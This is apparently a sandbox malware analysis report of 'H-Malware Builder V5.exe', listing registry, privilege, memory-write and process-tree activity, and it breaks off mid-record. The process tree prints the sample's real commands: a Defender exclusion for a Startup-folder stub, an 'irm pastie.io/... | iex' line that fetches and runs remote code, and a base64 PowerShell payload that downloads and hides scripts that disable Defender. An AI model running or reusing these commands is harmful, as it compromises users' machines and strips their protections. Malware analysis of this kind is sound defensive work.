description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 5a003100000000008359d74d100053797374656d33320000420009000400efbe874f77488359d74d2e000000b90c0000000001000000000000000000000000000000dafa0201530079007300740065006d0033003200000018000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 56003100000000004759134c100057696e646f777300400009000400efbe874f77488359d84d2e0000000006000000000100000000000000000000000000000095564900570069006e0064006f0077007300000016000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings taskmgr.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4860 SCHTASKS.exe 5036 SCHTASKS.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3556 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3520 powershell.exe 3520 powershell.exe 2500 Stub.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 3676 powershell.exe 3676 powershell.exe 3784 dllhost.exe 3784 dllhost.exe 3676 powershell.exe 3784 dllhost.exe 3784 dllhost.exe 3676 powershell.exe 3784 dllhost.exe 3784 dllhost.exe 3676 powershell.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 4232 powershell.exe 3784 dllhost.exe 3784 dllhost.exe 3676 powershell.exe 4232 powershell.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 3940 powershell.exe 3784 dllhost.exe 3784 dllhost.exe 3940 powershell.exe 3784 dllhost.exe 3784 dllhost.exe 3676 powershell.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 3940 powershell.exe 3784 dllhost.exe 3784 dllhost.exe 3676 powershell.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 3940 powershell.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe 3784 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 3556 Explorer.EXE 760 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 4932 chrome.exe 4932 chrome.exe 4932 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3520 powershell.exe Token: SeDebugPrivilege 2500 Stub.exe Token: SeDebugPrivilege 2500 Stub.exe Token: SeDebugPrivilege 3784 dllhost.exe Token: SeDebugPrivilege 3676 powershell.exe Token: SeDebugPrivilege 4232 powershell.exe Token: SeDebugPrivilege 3940 powershell.exe Token: SeShutdownPrivilege 3556 Explorer.EXE Token: SeCreatePagefilePrivilege 3556 Explorer.EXE Token: SeShutdownPrivilege 3556 Explorer.EXE Token: SeCreatePagefilePrivilege 3556 Explorer.EXE Token: SeShutdownPrivilege 3556 Explorer.EXE Token: SeCreatePagefilePrivilege 3556 Explorer.EXE Token: SeDebugPrivilege 4104 powershell.exe Token: SeShutdownPrivilege 3556 Explorer.EXE Token: SeCreatePagefilePrivilege 3556 Explorer.EXE Token: SeShutdownPrivilege 3044 svchost.exe Token: SeCreatePagefilePrivilege 3044 svchost.exe Token: SeShutdownPrivilege 3044 svchost.exe Token: SeCreatePagefilePrivilege 3044 svchost.exe Token: SeShutdownPrivilege 3044 svchost.exe Token: SeCreatePagefilePrivilege 3044 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2152 svchost.exe Token: SeIncreaseQuotaPrivilege 2152 svchost.exe Token: SeSecurityPrivilege 2152 svchost.exe Token: SeTakeOwnershipPrivilege 2152 svchost.exe Token: SeLoadDriverPrivilege 2152 svchost.exe Token: SeBackupPrivilege 2152 svchost.exe Token: SeRestorePrivilege 2152 svchost.exe Token: SeShutdownPrivilege 2152 svchost.exe Token: SeSystemEnvironmentPrivilege 2152 svchost.exe Token: SeManageVolumePrivilege 2152 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2152 svchost.exe Token: SeIncreaseQuotaPrivilege 2152 svchost.exe Token: SeSecurityPrivilege 2152 svchost.exe Token: SeTakeOwnershipPrivilege 2152 svchost.exe Token: SeLoadDriverPrivilege 2152 svchost.exe Token: SeSystemtimePrivilege 2152 svchost.exe Token: SeBackupPrivilege 2152 svchost.exe Token: SeRestorePrivilege 2152 svchost.exe Token: SeShutdownPrivilege 2152 svchost.exe Token: SeSystemEnvironmentPrivilege 2152 svchost.exe Token: SeUndockPrivilege 2152 svchost.exe Token: SeManageVolumePrivilege 2152 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2152 svchost.exe Token: SeIncreaseQuotaPrivilege 2152 svchost.exe Token: SeSecurityPrivilege 2152 svchost.exe Token: SeTakeOwnershipPrivilege 2152 svchost.exe Token: SeLoadDriverPrivilege 2152 svchost.exe Token: SeSystemtimePrivilege 2152 svchost.exe Token: SeBackupPrivilege 2152 svchost.exe Token: SeRestorePrivilege 2152 svchost.exe Token: SeShutdownPrivilege 2152 svchost.exe Token: SeSystemEnvironmentPrivilege 2152 svchost.exe Token: SeUndockPrivilege 2152 svchost.exe Token: SeManageVolumePrivilege 2152 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2152 svchost.exe Token: SeIncreaseQuotaPrivilege 2152 svchost.exe Token: SeSecurityPrivilege 2152 svchost.exe Token: SeTakeOwnershipPrivilege 2152 svchost.exe Token: SeLoadDriverPrivilege 2152 svchost.exe Token: SeSystemtimePrivilege 2152 svchost.exe Token: SeBackupPrivilege 2152 svchost.exe Token: SeRestorePrivilege 2152 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 3556 Explorer.EXE 3556 Explorer.EXE 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 3556 Explorer.EXE 760 taskmgr.exe 760 taskmgr.exe 3556 Explorer.EXE 3556 Explorer.EXE 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 3556 Explorer.EXE 760 taskmgr.exe 760 taskmgr.exe 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 760 taskmgr.exe 760 taskmgr.exe 760 taskmgr.exe 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 760 taskmgr.exe -
Suspicious use of SetWindowsHookEx 39 IoCs
pid Process 4580 Conhost.exe 3804 Conhost.exe 3496 Conhost.exe 4952 Conhost.exe 3144 Conhost.exe 4752 Conhost.exe 3772 Process not Found 880 Conhost.exe 3372 Conhost.exe 4764 Conhost.exe 1880 Process not Found 2408 Conhost.exe 3556 Explorer.EXE 3556 Explorer.EXE 2332 Conhost.exe 1880 Conhost.exe 3500 Conhost.exe 456 Process not Found 2660 Conhost.exe 1968 Conhost.exe 4444 Conhost.exe 4356 Conhost.exe 3996 Conhost.exe 2724 Conhost.exe 3252 Conhost.exe 348 Conhost.exe 1928 Conhost.exe 4436 Conhost.exe 5100 Conhost.exe 3556 Explorer.EXE 3556 Explorer.EXE 2188 Conhost.exe 4380 Conhost.exe 1968 Process not Found 3708 Conhost.exe 3532 Conhost.exe 3772 Conhost.exe 3996 Conhost.exe 3232 Conhost.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3568 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4804 wrote to memory of 3520 4804 H-Malware Builder V5.exe 83 PID 4804 wrote to memory of 3520 4804 H-Malware Builder V5.exe 83 PID 4804 wrote to memory of 2500 4804 H-Malware Builder V5.exe 85 PID 4804 wrote to memory of 2500 4804 H-Malware Builder V5.exe 85 PID 4804 wrote to memory of 2884 4804 H-Malware Builder V5.exe 86 PID 4804 wrote to memory of 2884 4804 H-Malware Builder V5.exe 86 PID 2500 wrote to memory of 3784 2500 Stub.exe 87 PID 2500 wrote to memory of 3784 2500 Stub.exe 87 PID 2500 wrote to memory of 3784 2500 Stub.exe 87 PID 2500 wrote to memory of 3784 2500 Stub.exe 87 PID 2500 wrote to memory of 3784 2500 Stub.exe 87 PID 2500 wrote to memory of 3784 2500 Stub.exe 87 PID 2500 wrote to memory of 3784 2500 Stub.exe 87 PID 2500 wrote to memory of 3784 2500 Stub.exe 87 PID 2500 wrote to memory of 3784 2500 Stub.exe 87 PID 2500 wrote to memory of 3784 2500 Stub.exe 87 PID 2500 wrote to memory of 3784 2500 Stub.exe 87 PID 2500 wrote to memory of 4168 2500 Stub.exe 88 PID 2500 wrote to memory of 4168 2500 Stub.exe 88 PID 2500 wrote to memory of 5036 2500 Stub.exe 90 PID 2500 wrote to memory of 5036 2500 Stub.exe 90 PID 2500 wrote to memory of 4860 2500 Stub.exe 91 PID 2500 wrote to memory of 4860 2500 Stub.exe 91 PID 4168 wrote to memory of 3676 4168 cmd.exe 94 PID 4168 wrote to memory of 3676 4168 cmd.exe 94 PID 3784 wrote to memory of 616 3784 dllhost.exe 5 PID 3784 wrote to memory of 672 3784 dllhost.exe 7 PID 3784 wrote to memory of 960 3784 dllhost.exe 12 PID 3784 wrote to memory of 332 3784 dllhost.exe 13 PID 3784 wrote to memory of 448 3784 dllhost.exe 14 PID 3784 wrote to memory of 956 3784 dllhost.exe 15 PID 3784 wrote to memory of 1040 3784 dllhost.exe 16 PID 3784 wrote to memory of 1064 3784 dllhost.exe 17 PID 3784 wrote to memory of 1212 3784 dllhost.exe 19 PID 3784 wrote to memory of 1220 3784 dllhost.exe 20 PID 3784 wrote to memory of 1328 3784 dllhost.exe 21 PID 3784 wrote to memory of 1344 3784 dllhost.exe 22 PID 3784 wrote to memory of 1392 3784 dllhost.exe 23 PID 3784 wrote to memory of 1436 3784 dllhost.exe 24 PID 3784 wrote to memory of 1448 3784 dllhost.exe 25 PID 3784 wrote to memory of 1464 3784 dllhost.exe 26 PID 3784 wrote to memory of 1608 3784 dllhost.exe 27 PID 3784 wrote to memory of 1616 3784 dllhost.exe 28 PID 3784 wrote to memory of 1680 3784 dllhost.exe 29 PID 3784 wrote to memory of 1756 3784 dllhost.exe 30 PID 3784 wrote to memory of 1828 3784 dllhost.exe 31 PID 3784 wrote to memory of 1848 3784 dllhost.exe 32 PID 3784 wrote to memory of 1956 3784 dllhost.exe 33 PID 3784 wrote to memory of 2012 3784 dllhost.exe 34 PID 3784 wrote to memory of 2020 3784 dllhost.exe 35 PID 3784 wrote to memory of 1724 3784 dllhost.exe 36 PID 3784 wrote to memory of 2136 3784 dllhost.exe 37 PID 3784 wrote to memory of 2152 3784 dllhost.exe 38 PID 3784 wrote to memory of 2244 3784 dllhost.exe 40 PID 3784 wrote to memory of 2356 3784 dllhost.exe 41 PID 3784 wrote to memory of 2464 3784 dllhost.exe 42 PID 3784 wrote to memory of 2472 3784 dllhost.exe 43 PID 3784 wrote to memory of 2664 3784 dllhost.exe 44 PID 3784 wrote to memory of 2676 3784 dllhost.exe 45 PID 3784 wrote to memory of 2784 3784 dllhost.exe 46 PID 3784 wrote to memory of 2828 3784 dllhost.exe 47 PID 3784 wrote to memory of 2840 3784 dllhost.exe 48 PID 3784 wrote to memory of 2852 3784 dllhost.exe 49 PID 3784 wrote to memory of 2860 3784 dllhost.exe 50 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:332
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1886fbc6-febb-4b11-b087-7f83c54105d5}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3784
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Drops file in System32 directory
PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:448
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:956
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1212 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2840
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1436
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1616
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2664
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1680
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1828
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1848
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2012
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2020
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1724
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2244
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2784
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
PID:2828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2852
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2860
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2876
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2896
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3428
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in System32 directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3556 -
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"2⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3520
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"4⤵
- Suspicious use of WriteProcessMemory
PID:4168 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "irm pastie.io/raw/fgaazw | iex"5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAGEAbQBkAHIAMQBpAHkAbAB0AFQAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAE0AYQBsAHcAYQByAGUAVABlAGEAbQAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC8AcgBhAHcALwBtAGEAaQBuAC8AUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAH